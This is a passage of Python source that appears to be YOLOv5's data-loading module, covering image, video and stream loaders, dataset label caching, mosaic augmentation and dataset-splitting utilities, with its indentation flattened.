if '*' in p:
files.extend(sorted(glob.glob(p, recursive=True))) # glob
elif os.path.isdir(p):
files.extend(sorted(glob.glob(os.path.join(p, '*.*')))) # dir
elif os.path.isfile(p):
files.append(p) # files
else:
raise FileNotFoundError(f'{p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
self.transforms = transforms # optional
self.vid_stride = vid_stride # video frame-rate stride
if any(videos):
self._new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
for _ in range(self.vid_stride):
self.cap.grab()
ret_val, im0 = self.cap.retrieve()
while not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
path = self.files[self.count]
self._new_video(path)
ret_val, im0 = self.cap.read()
self.frame += 1
# im0 = self._cv2_rotate(im0) # for use if cv2 autorotation is False
s = f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: '
else:
# Read image
self.count += 1
im0 = cv2.imread(path) # BGR
assert im0 is not None, f'Image Not Found {path}'
s = f'image {self.count}/{self.nf} {path}: '
if self.transforms:
im = self.transforms(im0) # transforms
else:
im = letterbox(im0, self.img_size, stride=self.stride, auto=self.auto)[0] # padded resize
im = im.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
im = np.ascontiguousarray(im) # contiguous
return path, im, im0, self.cap, s
def _new_video(self, path):
# Create a new video capture object
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT) / self.vid_stride)
self.orientation = int(self.cap.get(cv2.CAP_PROP_ORIENTATION_META)) # rotation degrees
# self.cap.set(cv2.CAP_PROP_ORIENTATION_AUTO, 0) # disable https://github.com/ultralytics/yolov5/issues/8493
def _cv2_rotate(self, im):
# Rotate a cv2 video manually
if self.orientation == 0:
return cv2.rotate(im, cv2.ROTATE_90_CLOCKWISE)
elif self.orientation == 180:
return cv2.rotate(im, cv2.ROTATE_90_COUNTERCLOCKWISE)
elif self.orientation == 90:
return cv2.rotate(im, cv2.ROTATE_180)
return im
def __len__(self):
return self.nf # number of files
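# Usage sketch (illustrative; the path is an assumption): iterate over a folder of images and/or videos:
#   for path, im, im0, cap, s in LoadImages('data/images', img_size=640, stride=32):
#       ...  # im is the letterboxed CHW RGB array ready for the model, im0 the original BGR frame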
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True, transforms=None, vid_stride=1):
torch.backends.cudnn.benchmark = True # faster for fixed-size inference
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
self.vid_stride = vid_stride # video frame-rate stride
sources = Path(sources).read_text().rsplit() if os.path.isfile(sources) else [sources]
n = len(sources)
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
st = f'{i + 1}/{n}: {s}... '
if urlparse(s).hostname in ('www.youtube.com', 'youtube.com', 'youtu.be'): # if source is YouTube video
# YouTube format i.e. 'https://www.youtube.com/watch?v=Zgi9g1ksQHc' or 'https://youtu.be/Zgi9g1ksQHc'
check_requirements(('pafy', 'youtube_dl==2020.12.2'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
if s == 0:
assert not is_colab(), '--source 0 webcam unsupported on Colab. Rerun command in a local environment.'
assert not is_kaggle(), '--source 0 webcam unsupported on Kaggle. Rerun command in a local environment.'
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'{st}Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) # warning: may return 0 or nan
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
self.fps[i] = max((fps if math.isfinite(fps) else 0) % 100, 0) or 30 # 30 FPS fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap, s]), daemon=True)
LOGGER.info(f"{st} Success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
LOGGER.info('') # newline
# check for common shapes
s = np.stack([letterbox(x, img_size, stride=stride, auto=auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
self.auto = auto and self.rect
self.transforms = transforms # optional
if not self.rect:
LOGGER.warning('WARNING ⚠️ Stream shapes differ. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f = 0, self.frames[i] # frame number, frame array
while cap.isOpened() and n < f:
n += 1
cap.grab() # .read() = .grab() followed by .retrieve()
if n % self.vid_stride == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
LOGGER.warning('WARNING ⚠️ Video stream unresponsive, please check your IP camera connection.')
self.imgs[i] = np.zeros_like(self.imgs[i])
cap.open(stream) # re-open stream if signal was lost
time.sleep(0.0) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
im0 = self.imgs.copy()
if self.transforms:
im = np.stack([self.transforms(x) for x in im0]) # transforms
else:
im = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0] for x in im0]) # resize
im = im[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
im = np.ascontiguousarray(im) # contiguous
return self.sources, im, im0, None, ''
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
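# Usage sketch (illustrative, reusing the example URL from the class comment): read batched frames from live sources:
#   for sources, im, im0, _, s in LoadStreams('rtsp://example.com/media.mp4', img_size=640, vid_stride=1):
#       ...  # im is a BCHW RGB batch (one entry per stream), im0 the list of raw BGR frames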
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = f'{os.sep}images{os.sep}', f'{os.sep}labels{os.sep}' # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
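# Example (illustrative path): img2label_paths(['/data/images/train/0001.jpg']) -> ['/data/labels/train/0001.txt'];
# only the last '/images/' component is swapped for '/labels/' and the suffix becomes '.txt'.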
class LoadImagesAndLabels(Dataset):
# YOLOv5 train_loader/val_loader, loads images and labels for training and validation
cache_version = 0.6 # dataset labels *.cache version
rand_interp_methods = [cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4]
def __init__(self,
path,
img_size=640,
batch_size=16,
augment=False,
hyp=None,
rect=False,
image_weights=False,
cache_images=False,
single_cls=False,
stride=32,
pad=0.0,
min_items=0,
prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations(size=img_size) if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('*.*')) # pathlib
elif p.is_file(): # file
with open(p) as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent, 1) if x.startswith('./') else x for x in t] # to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # to global path (pathlib)
else:
raise FileNotFoundError(f'{prefix}{p} does not exist')
self.im_files = sorted(x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS)
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in IMG_FORMATS]) # pathlib
assert self.im_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\n{HELP_URL}') from e
# Check cache
self.label_files = img2label_paths(self.im_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == self.cache_version # matches current version
assert cache['hash'] == get_hash(self.label_files + self.im_files) # identical hash
except Exception:
cache, exists = self.cache_labels(cache_path, prefix), False # run cache ops
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupt, total
if exists and LOCAL_RANK in {-1, 0}:
d = f"Scanning {cache_path}... {nf} images, {nm + ne} backgrounds, {nc} corrupt"
tqdm(None, desc=prefix + d, total=n, initial=n, bar_format=TQDM_BAR_FORMAT) # display cache results
if cache['msgs']:
LOGGER.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels found in {cache_path}, can not start training. {HELP_URL}'
# Read cache
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
nl = len(np.concatenate(labels, 0)) # number of labels
assert nl > 0 or not augment, f'{prefix}All labels empty in {cache_path}, can not start training. {HELP_URL}'
self.labels = list(labels)
self.shapes = np.array(shapes)
self.im_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
# Filter images
if min_items:
include = np.array([len(x) >= min_items for x in self.labels]).nonzero()[0].astype(int)
LOGGER.info(f'{prefix}{n - len(include)}/{n} images filtered from dataset')
self.im_files = [self.im_files[i] for i in include]
self.label_files = [self.label_files[i] for i in include]
self.labels = [self.labels[i] for i in include]
self.segments = [self.segments[i] for i in include]
self.shapes = self.shapes[include] # wh
# Create indices
n = len(self.shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Update labels
include_class = [] # filter labels to include only these classes (optional)
include_class_array = np.array(include_class).reshape(1, -1)
for i, (label, segment) in enumerate(zip(self.labels, self.segments)):
if include_class:
j = (label[:, 0:1] == include_class_array).any(1)
self.labels[i] = label[j]
if segment:
self.segments[i] = segment[j]
if single_cls: # single-class training, merge all classes into 0
self.labels[i][:, 0] = 0
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.im_files = [self.im_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.segments = [self.segments[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride
# Cache images into RAM/disk for faster training
if cache_images == 'ram' and not self.check_cache_ram(prefix=prefix):
cache_images = False
self.ims = [None] * n
self.npy_files = [Path(f).with_suffix('.npy') for f in self.im_files]
if cache_images:
b, gb = 0, 1 << 30 # bytes of cached images, bytes per gigabytes
self.im_hw0, self.im_hw = [None] * n, [None] * n
fcn = self.cache_images_to_disk if cache_images == 'disk' else self.load_image
results = ThreadPool(NUM_THREADS).imap(fcn, range(n))
pbar = tqdm(enumerate(results), total=n, bar_format=TQDM_BAR_FORMAT, disable=LOCAL_RANK > 0)
for i, x in pbar:
if cache_images == 'disk':
b += self.npy_files[i].stat().st_size
else: # 'ram'
self.ims[i], self.im_hw0[i], self.im_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
b += self.ims[i].nbytes
pbar.desc = f'{prefix}Caching images ({b / gb:.1f}GB {cache_images})'
pbar.close()
def check_cache_ram(self, safety_margin=0.1, prefix=''):
# Check image caching requirements vs available memory
b, gb = 0, 1 << 30 # bytes of cached images, bytes per gigabytes
n = min(self.n, 30) # extrapolate from 30 random images
for _ in range(n):
im = cv2.imread(random.choice(self.im_files)) # sample image
ratio = self.img_size / max(im.shape[0], im.shape[1]) # max(h, w) # ratio
b += im.nbytes * ratio ** 2
mem_required = b * self.n / n # GB required to cache dataset into RAM
mem = psutil.virtual_memory()
cache = mem_required * (1 + safety_margin) < mem.available # to cache or not to cache, that is the question
if not cache:
LOGGER.info(f"{prefix}{mem_required / gb:.1f}GB RAM required, "
f"{mem.available / gb:.1f}/{mem.total / gb:.1f}GB available, "
f"{'caching images ✅' if cache else 'not caching images ⚠️'}")
return cache
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning {path.parent / path.stem}..."
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap(verify_image_label, zip(self.im_files, self.label_files, repeat(prefix))),
desc=desc,
total=len(self.im_files),
bar_format=TQDM_BAR_FORMAT)
for im_file, lb, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [lb, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc} {nf} images, {nm + ne} backgrounds, {nc} corrupt"
pbar.close()
if msgs:
LOGGER.info('\n'.join(msgs))
if nf == 0:
LOGGER.warning(f'{prefix}WARNING ⚠️ No labels found in {path}. {HELP_URL}')
x['hash'] = get_hash(self.label_files + self.im_files)
x['results'] = nf, nm, ne, nc, len(self.im_files)
x['msgs'] = msgs # warnings
x['version'] = self.cache_version # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
LOGGER.info(f'{prefix}New cache created: {path}')
except Exception as e:
LOGGER.warning(f'{prefix}WARNING ⚠️ Cache directory {path.parent} is not writeable: {e}') # not writeable
return x
def __len__(self):
return len(self.im_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = self.load_mosaic(index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *self.load_mosaic(random.randint(0, self.n - 1)))
else:
# Load image
img, (h0, w0), (h, w) = self.load_image(index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
img, labels = random_perspective(img,
labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
nl = len(labels) # update after albumentations
# HSV color-space
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
# nl = len(labels) # update after cutout
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.im_files[index], shapes
def load_image(self, i):
# Loads 1 image from dataset index 'i', returns (im, original hw, resized hw)
im, f, fn = self.ims[i], self.im_files[i], self.npy_files[i],
if im is None: # not cached in RAM
if fn.exists(): # load npy
im = np.load(fn)
else: # read image
im = cv2.imread(f) # BGR
assert im is not None, f'Image Not Found {f}'
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
interp = cv2.INTER_LINEAR if (self.augment or r > 1) else cv2.INTER_AREA
im = cv2.resize(im, (int(w0 * r), int(h0 * r)), interpolation=interp)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
return self.ims[i], self.im_hw0[i], self.im_hw[i] # im, hw_original, hw_resized
def cache_images_to_disk(self, i):
# Saves an image as an *.npy file for faster loading
f = self.npy_files[i]
if not f.exists():
np.save(f.as_posix(), cv2.imread(self.im_files[i]))
def load_mosaic(self, index):
# YOLOv5 4-mosaic loader. Loads 1 image + 3 random images into a 4-image mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = (int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border) # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = self.load_image(index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4,
labels4,
segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# YOLOv5 9-mosaic loader. Loads 1 image + 8 random images into a 9-image mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
random.shuffle(indices)
hp, wp = -1, -1 # height, width previous
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = self.load_image(index)
# place img in img9
if i == 0: # center
                img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8)  # base image with 9 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = (max(x, 0) for x in c) # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = (int(random.uniform(0, s)) for _ in self.mosaic_border) # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9, segments9 = copy_paste(img9, labels9, segments9, p=self.hyp['copy_paste'])
img9, labels9 = random_perspective(img9,
labels9,
segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
@staticmethod
def collate_fn(batch):
im, label, path, shapes = zip(*batch) # transposed
for i, lb in enumerate(label):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
im, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
im4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0.0, 0, 0, 1, 0, 0]])
wo = torch.tensor([[0.0, 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, 0.5, 0.5, 0.5, 0.5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im1 = F.interpolate(im[i].unsqueeze(0).float(), scale_factor=2.0, mode='bilinear',
align_corners=False)[0].type(im[i].type())
lb = label[i]
else:
im1 = torch.cat((torch.cat((im[i], im[i + 1]), 1), torch.cat((im[i + 2], im[i + 3]), 1)), 2)
lb = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
im4.append(im1)
label4.append(lb)
for i, lb in enumerate(label4):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def flatten_recursive(path=DATASETS_DIR / 'coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(f'{str(path)}_flat')
if os.path.exists(new_path):
shutil.rmtree(new_path) # delete output folder
os.makedirs(new_path) # make new output folder
for file in tqdm(glob.glob(f'{str(Path(path))}/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path=DATASETS_DIR / 'coco128'): # from utils.dataloaders import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classification') if (path / 'classification').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file) as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
                    f = (path / 'classification') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg'  # new filename (matches the 'classification' dir removed above)
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path=DATASETS_DIR / 'coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.dataloaders import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sorted(x for x in path.rglob('*.*') if x.suffix[1:].lower() in IMG_FORMATS) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
for x in txt:
if (path.parent / x).exists():
(path.parent / x).unlink() # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write(f'./{img.relative_to(path.parent).as_posix()}' + '\n') # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc, msg, segments = 0, 0, 0, 0, '', [] # number (missing, found, empty, corrupt), message, segments
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG
ImageOps.exif_transpose(Image.open(im_file)).save(im_file, 'JPEG', subsampling=0, quality=100)
msg = f'{prefix}WARNING ⚠️ {im_file}: corrupt JPEG restored and saved'
# verify labels
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file) as f:
lb = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any(len(x) > 6 for x in lb): # is segment
classes = np.array([x[0] for x in lb], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in lb] # (cls, xy1...)
lb = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
lb = np.array(lb, dtype=np.float32)
nl = len(lb)
if nl:
assert lb.shape[1] == 5, f'labels require 5 columns, {lb.shape[1]} columns detected'
assert (lb >= 0).all(), f'negative label values {lb[lb < 0]}'
assert (lb[:, 1:] <= 1).all(), f'non-normalized or out of bounds coordinates {lb[:, 1:][lb[:, 1:] > 1]}'
_, i = np.unique(lb, axis=0, return_index=True)
if len(i) < nl: # duplicate row check
lb = lb[i] # remove duplicates
if segments:
segments = [segments[x] for x in i]
msg = f'{prefix}WARNING ⚠️ {im_file}: {nl - len(i)} duplicate labels removed'
else:
ne = 1 # label empty
lb = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
lb = np.zeros((0, 5), dtype=np.float32)
return im_file, lb, shape, segments, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}WARNING ⚠️ {im_file}: ignoring corrupt image/label: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
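# Usage sketch (illustrative, mirroring how YOLOv5-style label caching typically consumes this function;
# Pool, repeat and NUM_THREADS are assumed to be available in the caller):
#   with Pool(NUM_THREADS) as pool:
#       for im_file, lb, shape, segments, nm, nf, ne, nc, msg in pool.imap(
#               verify_image_label, zip(im_files, label_files, repeat(prefix))):
#           ...  # accumulate nm (missing), nf (found), ne (empty), nc (corrupt) and cache lb/shape/segments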
class HUBDatasetStats():
""" Class for generating HUB dataset JSON and `-hub` dataset directory
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
Usage
from utils.dataloaders import HUBDatasetStats
stats = HUBDatasetStats('coco128.yaml', autodownload=True) # usage 1
stats = HUBDatasetStats('path/to/coco128.zip') # usage 2
